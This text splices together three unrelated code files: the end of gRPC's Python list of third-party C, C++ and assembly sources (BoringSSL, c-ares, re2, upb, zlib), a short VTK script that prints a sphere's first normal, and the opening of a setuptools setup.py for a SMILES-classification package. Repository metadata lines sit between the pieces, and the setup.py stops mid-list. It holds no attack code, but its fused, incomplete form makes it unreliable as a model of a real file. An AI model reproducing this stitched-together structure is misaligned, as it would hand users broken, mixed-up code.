'third_party/boringssl-with-bazel/src/crypto/x509/i2d_pr.c',
'third_party/boringssl-with-bazel/src/crypto/x509/name_print.c',
'third_party/boringssl-with-bazel/src/crypto/x509/rsa_pss.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_crl.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_req.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_x509.c',
'third_party/boringssl-with-bazel/src/crypto/x509/t_x509a.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_att.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_cmp.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_d2.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_def.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_ext.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_lu.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_obj.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_req.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_set.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_trs.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_txt.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_v3.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_vfy.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509_vpm.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509cset.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509name.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509rset.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x509spki.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_algor.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_all.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_attrib.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_crl.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_exten.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_info.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_name.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_pkey.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_pubkey.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_req.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_sig.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_spki.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_val.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_x509.c',
'third_party/boringssl-with-bazel/src/crypto/x509/x_x509a.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_cache.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_data.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_lib.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_map.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_node.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/pcy_tree.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_akey.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_akeya.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_alt.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_bcons.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_bitst.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_conf.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_cpols.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_crld.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_enum.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_extku.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_genn.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_ia5.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_info.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_int.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_lib.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_ncons.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_ocsp.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pci.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pcia.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pcons.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_pmaps.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_prn.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_purp.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_skey.c',
'third_party/boringssl-with-bazel/src/crypto/x509v3/v3_utl.c',
'third_party/boringssl-with-bazel/src/ssl/bio_ssl.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_both.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_lib.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_pkt.cc',
'third_party/boringssl-with-bazel/src/ssl/d1_srtp.cc',
'third_party/boringssl-with-bazel/src/ssl/dtls_method.cc',
'third_party/boringssl-with-bazel/src/ssl/dtls_record.cc',
'third_party/boringssl-with-bazel/src/ssl/encrypted_client_hello.cc',
'third_party/boringssl-with-bazel/src/ssl/extensions.cc',
'third_party/boringssl-with-bazel/src/ssl/handoff.cc',
'third_party/boringssl-with-bazel/src/ssl/handshake.cc',
'third_party/boringssl-with-bazel/src/ssl/handshake_client.cc',
'third_party/boringssl-with-bazel/src/ssl/handshake_server.cc',
'third_party/boringssl-with-bazel/src/ssl/s3_both.cc',
'third_party/boringssl-with-bazel/src/ssl/s3_lib.cc',
'third_party/boringssl-with-bazel/src/ssl/s3_pkt.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_aead_ctx.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_asn1.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_buffer.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_cert.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_cipher.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_file.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_key_share.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_lib.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_privkey.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_session.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_stat.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_transcript.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_versions.cc',
'third_party/boringssl-with-bazel/src/ssl/ssl_x509.cc',
'third_party/boringssl-with-bazel/src/ssl/t1_enc.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_both.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_client.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_enc.cc',
'third_party/boringssl-with-bazel/src/ssl/tls13_server.cc',
'third_party/boringssl-with-bazel/src/ssl/tls_method.cc',
'third_party/boringssl-with-bazel/src/ssl/tls_record.cc',
'third_party/cares/cares/src/lib/ares__close_sockets.c',
'third_party/cares/cares/src/lib/ares__get_hostent.c',
'third_party/cares/cares/src/lib/ares__parse_into_addrinfo.c',
'third_party/cares/cares/src/lib/ares__read_line.c',
'third_party/cares/cares/src/lib/ares__readaddrinfo.c',
'third_party/cares/cares/src/lib/ares__sortaddrinfo.c',
'third_party/cares/cares/src/lib/ares__timeval.c',
'third_party/cares/cares/src/lib/ares_android.c',
'third_party/cares/cares/src/lib/ares_cancel.c',
'third_party/cares/cares/src/lib/ares_create_query.c',
'third_party/cares/cares/src/lib/ares_data.c',
'third_party/cares/cares/src/lib/ares_destroy.c',
'third_party/cares/cares/src/lib/ares_expand_name.c',
'third_party/cares/cares/src/lib/ares_expand_string.c',
'third_party/cares/cares/src/lib/ares_fds.c',
'third_party/cares/cares/src/lib/ares_free_hostent.c',
'third_party/cares/cares/src/lib/ares_free_string.c',
'third_party/cares/cares/src/lib/ares_freeaddrinfo.c',
'third_party/cares/cares/src/lib/ares_getaddrinfo.c',
'third_party/cares/cares/src/lib/ares_getenv.c',
'third_party/cares/cares/src/lib/ares_gethostbyaddr.c',
'third_party/cares/cares/src/lib/ares_gethostbyname.c',
'third_party/cares/cares/src/lib/ares_getnameinfo.c',
'third_party/cares/cares/src/lib/ares_getsock.c',
'third_party/cares/cares/src/lib/ares_init.c',
'third_party/cares/cares/src/lib/ares_library_init.c',
'third_party/cares/cares/src/lib/ares_llist.c',
'third_party/cares/cares/src/lib/ares_mkquery.c',
'third_party/cares/cares/src/lib/ares_nowarn.c',
'third_party/cares/cares/src/lib/ares_options.c',
'third_party/cares/cares/src/lib/ares_parse_a_reply.c',
'third_party/cares/cares/src/lib/ares_parse_aaaa_reply.c',
'third_party/cares/cares/src/lib/ares_parse_caa_reply.c',
'third_party/cares/cares/src/lib/ares_parse_mx_reply.c',
'third_party/cares/cares/src/lib/ares_parse_naptr_reply.c',
'third_party/cares/cares/src/lib/ares_parse_ns_reply.c',
'third_party/cares/cares/src/lib/ares_parse_ptr_reply.c',
'third_party/cares/cares/src/lib/ares_parse_soa_reply.c',
'third_party/cares/cares/src/lib/ares_parse_srv_reply.c',
'third_party/cares/cares/src/lib/ares_parse_txt_reply.c',
'third_party/cares/cares/src/lib/ares_platform.c',
'third_party/cares/cares/src/lib/ares_process.c',
'third_party/cares/cares/src/lib/ares_query.c',
'third_party/cares/cares/src/lib/ares_search.c',
'third_party/cares/cares/src/lib/ares_send.c',
'third_party/cares/cares/src/lib/ares_strcasecmp.c',
'third_party/cares/cares/src/lib/ares_strdup.c',
'third_party/cares/cares/src/lib/ares_strerror.c',
'third_party/cares/cares/src/lib/ares_strsplit.c',
'third_party/cares/cares/src/lib/ares_timeout.c',
'third_party/cares/cares/src/lib/ares_version.c',
'third_party/cares/cares/src/lib/ares_writev.c',
'third_party/cares/cares/src/lib/bitncmp.c',
'third_party/cares/cares/src/lib/inet_net_pton.c',
'third_party/cares/cares/src/lib/inet_ntop.c',
'third_party/cares/cares/src/lib/windows_port.c',
'third_party/re2/re2/bitstate.cc',
'third_party/re2/re2/compile.cc',
'third_party/re2/re2/dfa.cc',
'third_party/re2/re2/filtered_re2.cc',
'third_party/re2/re2/mimics_pcre.cc',
'third_party/re2/re2/nfa.cc',
'third_party/re2/re2/onepass.cc',
'third_party/re2/re2/parse.cc',
'third_party/re2/re2/perl_groups.cc',
'third_party/re2/re2/prefilter.cc',
'third_party/re2/re2/prefilter_tree.cc',
'third_party/re2/re2/prog.cc',
'third_party/re2/re2/re2.cc',
'third_party/re2/re2/regexp.cc',
'third_party/re2/re2/set.cc',
'third_party/re2/re2/simplify.cc',
'third_party/re2/re2/stringpiece.cc',
'third_party/re2/re2/tostring.cc',
'third_party/re2/re2/unicode_casefold.cc',
'third_party/re2/re2/unicode_groups.cc',
'third_party/re2/util/pcre.cc',
'third_party/re2/util/rune.cc',
'third_party/re2/util/strutil.cc',
'third_party/upb/upb/decode.c',
'third_party/upb/upb/decode_fast.c',
'third_party/upb/upb/def.c',
'third_party/upb/upb/encode.c',
'third_party/upb/upb/msg.c',
'third_party/upb/upb/reflection.c',
'third_party/upb/upb/table.c',
'third_party/upb/upb/text_encode.c',
'third_party/upb/upb/upb.c',
'third_party/zlib/adler32.c',
'third_party/zlib/compress.c',
'third_party/zlib/crc32.c',
'third_party/zlib/deflate.c',
'third_party/zlib/gzclose.c',
'third_party/zlib/gzlib.c',
'third_party/zlib/gzread.c',
'third_party/zlib/gzwrite.c',
'third_party/zlib/infback.c',
'third_party/zlib/inffast.c',
'third_party/zlib/inflate.c',
'third_party/zlib/inftrees.c',
'third_party/zlib/trees.c',
'third_party/zlib/uncompr.c',
'third_party/zlib/zutil.c',
]
ASM_SOURCE_FILES = {
'crypto_ios_aarch64': [
'third_party/boringssl-with-bazel/ios-aarch64/crypto/chacha/chacha-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/aesv8-armx64.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/armv8-mont.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/ghash-neon-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/ghashv8-armx64.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/sha1-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/sha256-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/sha512-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/fipsmodule/vpaes-armv8.S',
'third_party/boringssl-with-bazel/ios-aarch64/crypto/test/trampoline-armv8.S',
],
'crypto_ios_arm': [
'third_party/boringssl-with-bazel/ios-arm/crypto/chacha/chacha-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/aesv8-armx32.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/armv4-mont.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/bsaes-armv7.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/ghash-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/ghashv8-armx32.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/sha1-armv4-large.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/sha256-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/sha512-armv4.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/fipsmodule/vpaes-armv7.S',
'third_party/boringssl-with-bazel/ios-arm/crypto/test/trampoline-armv4.S',
],
'crypto_linux_aarch64': [
'third_party/boringssl-with-bazel/linux-aarch64/crypto/chacha/chacha-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/aesv8-armx64.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/armv8-mont.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/ghash-neon-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/ghashv8-armx64.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/sha1-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/sha256-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/sha512-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/fipsmodule/vpaes-armv8.S',
'third_party/boringssl-with-bazel/linux-aarch64/crypto/test/trampoline-armv8.S',
],
'crypto_linux_arm': [
'third_party/boringssl-with-bazel/linux-arm/crypto/chacha/chacha-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/aesv8-armx32.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/armv4-mont.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/bsaes-armv7.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/ghash-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/ghashv8-armx32.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/sha1-armv4-large.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/sha256-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/sha512-armv4.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/fipsmodule/vpaes-armv7.S',
'third_party/boringssl-with-bazel/linux-arm/crypto/test/trampoline-armv4.S',
'third_party/boringssl-with-bazel/src/crypto/curve25519/asm/x25519-asm-arm.S',
'third_party/boringssl-with-bazel/src/crypto/poly1305/poly1305_arm_asm.S',
],
'crypto_linux_ppc64le': [
'third_party/boringssl-with-bazel/linux-ppc64le/crypto/fipsmodule/aesp8-ppc.S',
'third_party/boringssl-with-bazel/linux-ppc64le/crypto/fipsmodule/ghashp8-ppc.S',
'third_party/boringssl-with-bazel/linux-ppc64le/crypto/test/trampoline-ppc.S',
],
'crypto_linux_x86': [
'third_party/boringssl-with-bazel/linux-x86/crypto/chacha/chacha-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/aesni-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/bn-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/co-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/ghash-ssse3-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/ghash-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/md5-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/sha1-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/sha256-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/sha512-586.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/vpaes-x86.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/fipsmodule/x86-mont.S',
'third_party/boringssl-with-bazel/linux-x86/crypto/test/trampoline-x86.S',
],
'crypto_linux_x86_64': [
'third_party/boringssl-with-bazel/linux-x86_64/crypto/chacha/chacha-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/cipher_extra/aes128gcmsiv-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/cipher_extra/chacha20_poly1305_x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/aesni-gcm-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/aesni-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/ghash-ssse3-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/ghash-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/md5-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/p256-x86_64-asm.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/p256_beeu-x86_64-asm.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/rdrand-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/rsaz-avx2.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/sha1-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/sha256-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/sha512-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/vpaes-x86_64.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/x86_64-mont.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/fipsmodule/x86_64-mont5.S',
'third_party/boringssl-with-bazel/linux-x86_64/crypto/test/trampoline-x86_64.S',
'third_party/boringssl-with-bazel/src/crypto/hrss/asm/poly_rq_mul.S',
],
'crypto_mac_x86': [
'third_party/boringssl-with-bazel/mac-x86/crypto/chacha/chacha-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/aesni-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/bn-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/co-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/ghash-ssse3-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/ghash-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/md5-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/sha1-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/sha256-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/sha512-586.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/vpaes-x86.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/fipsmodule/x86-mont.S',
'third_party/boringssl-with-bazel/mac-x86/crypto/test/trampoline-x86.S',
],
'crypto_mac_x86_64': [
'third_party/boringssl-with-bazel/mac-x86_64/crypto/chacha/chacha-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/cipher_extra/aes128gcmsiv-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/cipher_extra/chacha20_poly1305_x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/aesni-gcm-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/aesni-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/ghash-ssse3-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/ghash-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/md5-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/p256-x86_64-asm.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/p256_beeu-x86_64-asm.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/rdrand-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/rsaz-avx2.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/sha1-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/sha256-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/sha512-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/vpaes-x86_64.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/x86_64-mont.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/fipsmodule/x86_64-mont5.S',
'third_party/boringssl-with-bazel/mac-x86_64/crypto/test/trampoline-x86_64.S',
],
'crypto_win_aarch64': [
'third_party/boringssl-with-bazel/win-aarch64/crypto/chacha/chacha-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/aesv8-armx64.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/armv8-mont.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/ghash-neon-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/ghashv8-armx64.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/sha1-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/sha256-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/sha512-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/fipsmodule/vpaes-armv8.S',
'third_party/boringssl-with-bazel/win-aarch64/crypto/test/trampoline-armv8.S',
],
'crypto_win_x86': [
'third_party/boringssl-with-bazel/win-x86/crypto/chacha/chacha-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/aesni-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/bn-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/co-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/ghash-ssse3-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/ghash-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/md5-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/sha1-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/sha256-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/sha512-586.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/vpaes-x86.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/fipsmodule/x86-mont.asm',
'third_party/boringssl-with-bazel/win-x86/crypto/test/trampoline-x86.asm',
],
'crypto_win_x86_64': [
'third_party/boringssl-with-bazel/win-x86_64/crypto/chacha/chacha-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/cipher_extra/aes128gcmsiv-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/cipher_extra/chacha20_poly1305_x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/aesni-gcm-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/aesni-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/ghash-ssse3-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/ghash-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/md5-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/p256-x86_64-asm.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/p256_beeu-x86_64-asm.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/rdrand-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/rsaz-avx2.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/sha1-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/sha256-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/sha512-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/vpaes-x86_64.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/x86_64-mont.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/fipsmodule/x86_64-mont5.asm',
'third_party/boringssl-with-bazel/win-x86_64/crypto/test/trampoline-x86_64.asm',
],
}
|
ctiller/grpc
|
src/python/grpcio/grpc_core_dependencies.py
|
Python
|
apache-2.0
| 88,940
|
[
"ORCA"
] |
1539327e7f6064081c95826e0ba9119d511e8d89f0497d82885e164322a648d3
|
from __future__ import print_function
import vtk
def main():
# setup sphere
sphereSource = vtk.vtkSphereSource()
sphereSource.Update()
polydata = vtk.vtkPolyData()
polydata.ShallowCopy(sphereSource.GetOutput())
normals = polydata.GetPointData().GetNormals()
normal0 = normals.GetTuple3(0)
print("Normal0: {:3.1f} {:3.1f} {:3.1f}".format(normal0[0], normal0[1], normal0[2]))
if __name__ == '__main__':
main()
|
lorensen/VTKExamples
|
src/Python/Arrays/GetValues.py
|
Python
|
apache-2.0
| 452
|
[
"VTK"
] |
e94f9b66ec09d284e1a05ffb600b31b7157029f32fb82950653726ef4010b35e
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Arguments marked as "Required" below must be included for upload to PyPI.
# Fields marked as "Optional" may be commented out.
setup(
# This is the name of your project. The first time you publish this
# package, this name will be registered for you. It will determine how
# users can install this project, e.g.:
#
# $ pip install sampleproject
#
# And where it will live on PyPI: https://pypi.org/project/sampleproject/
#
# There are some restrictions on what makes a valid project name
# specification here:
# https://packaging.python.org/specifications/core-metadata/#name
name='moloi', # Required
# Versions should comply with PEP 440:
# https://www.python.org/dev/peps/pep-0440/
#
# For a discussion on single-sourcing the version across setup.py and the
# project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.0.0', # Required
# This is a one-line description or tagline of what your project does. This
# corresponds to the "Summary" metadata field:
# https://packaging.python.org/specifications/core-metadata/#summary
description='SMILES classification', # Required
# This is an optional longer description of your project that represents
# the body of text which users will see when they visit PyPI.
#
# Often, this is the same as your README, so you can just read it in from
# that file directly (as we have already done above)
#
# This field corresponds to the "Description" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-optional
#long_description=long_description, # Optional
# Denotes that our long_description is in Markdown; valid values are
# text/plain, text/x-rst, and text/markdown
#
# Optional if long_description is written in reStructuredText (rst) but
# required for plain-text or Markdown; if unspecified, "applications should
# attempt to render [the long_description] as text/x-rst; charset=UTF-8 and
# fall back to text/plain if it is not valid rst" (see link below)
#
# This field corresponds to the "Description-Content-Type" metadata field:
# https://packaging.python.org/specifications/core-metadata/#description-content-type-optional
#long_description_content_type='text/markdown', # Optional (see note above)
# This should be a valid link to your project's main homepage.
#
# This field corresponds to the "Home-Page" metadata field:
# https://packaging.python.org/specifications/core-metadata/#home-page-optional
url='https://github.com/DentonJC/virtual_screening', # Optional
# This should be your name or the name of the organization which owns the
# project.
author='DentonJC', # Optional
# This should be a valid email address corresponding to the author listed
# above.
author_email='', # Optional
# Classifiers help users find your project by categorizing it.
#
# For a list of valid classifiers, see https://pypi.org/classifiers/
classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish
'License :: GPL-3.0',
# Specify the Python versions you support here. In particular, ensure
